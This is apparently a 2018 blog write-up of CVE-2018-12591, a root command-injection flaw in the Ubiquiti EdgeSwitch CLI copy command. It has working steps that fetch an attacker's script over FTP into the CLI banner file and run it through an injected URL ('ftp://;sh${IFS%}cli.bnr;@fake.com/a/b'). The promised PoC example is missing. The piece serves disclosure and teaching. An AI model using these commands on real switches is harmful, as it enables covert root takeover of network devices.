June 21, 2018

Exploiting CVE-2018-12591

Yesterday I managed to get my first two CVEs. One of which is CVE-2018-12591.  This is a writeup of how this vulnerability can be exploited. Although it’s not the most complicated vulnerability to exploit, it might still be helpful for those wishing to learn. As always, this is intended for purely educational purposes.

So a brief summary of the vulnerability:

It’s possible to execute arbitrary commands as root by exploiting commands in the copy command by injecting into the user part of the FTP/TFTP URL. This is  due to the FTP user details are directly put into an OS command for  FTP/TFTP without proper filtering.
The EdgeSwitch is different to other Ubiquiti products because whereas the EdgeRouter and ToughSwitch provide full SSH access, with the EdgeSwitch you are only presented a minimal CLI.

Although the administrator credentials are required, exploiting this  vulnerability allows the attacker to break out of the restricted CLI to elevate their privileges greater than the administrator themselves are able to, taking full control of the Switch possibly without the administrator ever knowing.

Exploitation:

Although some things (such as forward slashes and spaces, however there seem to be a fair few other nuances as well) are filtered, techniques can be used to write a minimal payload for it. An example bypassing these filters is shown below.

PoC for creating a file called ‘a’ with the root directory listing in it:

Advanced Exploitation:

As you can see, this is quite a chaotic way of writing payloads and won’t be particularly helpful for more complicated commands.

Luckily for us there is an alternative way of executing a payload. We use the CLI Banner (/mnt/fastpath/cli.bnr) file as a store for our script and then execute it directly.

  • Set up an FTP server.
  • Create a file called malicious with your bash script in it.
  • Telnet/SSH into the CLI.
  • Enable privileged mode.
  • Type copy ftp://<Your FTP Username>@<Your FTP Server IP>/malicious nvram:clibanner
  • Type copy nvram:log ftp://;sh${IFS%}cli.bnr;@fake.com/a/b in order to execute the script.